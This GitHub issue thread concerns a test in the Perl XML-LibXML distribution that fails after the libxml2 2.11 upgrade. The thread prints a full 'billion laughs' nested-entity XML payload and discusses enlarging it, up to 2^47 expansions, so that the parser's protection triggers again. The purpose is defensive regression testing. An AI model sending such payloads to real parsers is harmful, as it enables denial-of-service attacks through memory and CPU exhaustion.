shlomif / perl-XML-LibXML

The XML-LibXML CPAN Distribution for Processing XML using the libxml2 library
https://metacpan.org/release/XML-LibXML

libxml2-2.11 breaks t/35huge_mode.t #79

Closed martinetd closed 1 year ago

martinetd commented 1 year ago

Updating from libxml2 2.10.4 to libxml2 2.11.4 seems to break this test as of XML-LibXML-2.0208. (I also tried the master branch on principle, but it made no difference.)

t/35huge_mode.t .................................... 1/5
1..5
ok 1 - huge mode disabled by default
not ok 2 - exception thrown during parse
#   Failed test 'exception thrown during parse'
#   at t/35huge_mode.t line 58.
#          got: ''
#     expected: anything else
not ok 3 - exception refers to entity reference loop
#   Failed test 'exception refers to entity reference loop'
#   at t/35huge_mode.t line 60.
#                   ''
#     doesn't match '(?^si:entity.*loop)'
ok 4 - no exception thrown during parse
ok 5 - entity was parsed and expanded correctly
# Looks like you failed 2 tests of 5.

This was reported on Gentoo https://bugs.gentoo.org/show_bug.cgi?id=906095 and NixOS https://github.com/NixOS/nixpkgs/issues/243214

I'm not too familiar with Perl, so I'm not quite sure what went wrong here. $@ is empty when it shouldn't be, sure, but how do you get the exception out of this, if there was one as the message suggests? $doc looks sane enough if I print it:

<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ENTITY lol1 "&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>

It is easy enough to reproduce, so I'm happy to test anything you'd like investigated.

jtojnar commented 1 year ago

I guess this has something to do with the following change in 2.11.0:

Protection against entity expansion attacks, also known as "billion laughs" has been greatly improved. Malicious files should be detected reliably now and false positives should be reduced. It is possible though that large documents which make heavy use of entities are rejected now.

Perhaps this commit: https://gitlab.gnome.org/GNOME/libxml2/-/commit/463bbeeca1805b5c4828f50d0fefc4eebaf620df

Maybe try increasing the number of entities – the current 2⁹ is not a very high number.
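To put the 2⁹ figure in perspective, here is a minimal Python sketch of the arithmetic, assuming the document shape quoted above: a base entity whose text is "lol", followed by levels that each reference the previous entity twice. The function names `expanded_copies` and `expanded_bytes` are made up for illustration and are not part of libxml2 or XML-LibXML.

```python
def expanded_copies(levels: int, fanout: int = 2) -> int:
    """Number of copies of the base entity after full expansion.

    Each level references the previous entity `fanout` times,
    so the count multiplies by `fanout` at every level.
    """
    return fanout ** levels


def expanded_bytes(levels: int, fanout: int = 2, base: str = "lol") -> int:
    """Size in bytes of the fully expanded text (ASCII base string assumed)."""
    return len(base) * expanded_copies(levels, fanout)


if __name__ == "__main__":
    # 9 levels is the test document, 30 and 47 are the sizes named in this thread.
    for levels in (9, 30, 47):
        print(levels, expanded_copies(levels), expanded_bytes(levels))
```

With 9 levels the fully expanded text is only 512 copies of "lol", about 1.5 KB, which is far smaller than many ordinary documents.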

martinetd commented 1 year ago

Ah, I finally understand the test; ok. So the "evil" "billion laughs" XML is no longer rejected, even though it should be...

Maybe try increasing the number of entities – the current 2⁹ is not a very high number.

Hmm, sorry, I'd have to be spoon-fed how to change that limit. But in this case the parse succeeded when it should have failed, so I think it's the other way around: make the evil_xml worse? Even copying libxml2's horrible test/recurse/lol6.xml that was mentioned didn't do it. In the same directory, lol4 has 2^30 entities and still doesn't raise an exception.

martinetd commented 1 year ago

Ah, you probably just meant raising the number of entities in the test. I went a step further with test/recurse/lol_classic.xml as of master (2^47), and that did the trick. Will send a PR.
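For anyone who wants to experiment with deeper nesting, the following Python sketch generates a document in the same shape as the one printed earlier in this issue. It is only an illustration: the helper name `billion_laughs` and its parameters are hypothetical, and the thread does not say how lol_classic.xml itself is laid out, so this is not a copy of that file.

```python
def billion_laughs(levels: int, fanout: int = 2, name: str = "lol") -> str:
    """Build a nested-entity XML document as a string (nothing is parsed here).

    levels: number of entity levels stacked on top of the base entity
    fanout: how many times each level references the previous one
    """
    lines = [
        '<?xml version="1.0"?>',
        "<!DOCTYPE %sz [" % name,
        '<!ENTITY %s "%s">' % (name, name),
    ]
    prev = name
    for i in range(1, levels + 1):
        cur = "%s%d" % (name, i)
        refs = ("&%s;" % prev) * fanout  # e.g. "&lol;&lol;"
        lines.append('<!ENTITY %s "%s">' % (cur, refs))
        prev = cur
    lines.append("]>")
    # The root element references the deepest entity.
    lines.append("<%sz>&%s;</%sz>" % (name, prev, name))
    return "\n".join(lines)


if __name__ == "__main__":
    # levels=9, fanout=2 reproduces the document shown in the report.
    print(billion_laughs(9))
```

Calling `billion_laughs(47)` would give 2^47 expansions of the base entity with the same layout; whether a given libxml2 version rejects such a document has to be checked against the parser itself.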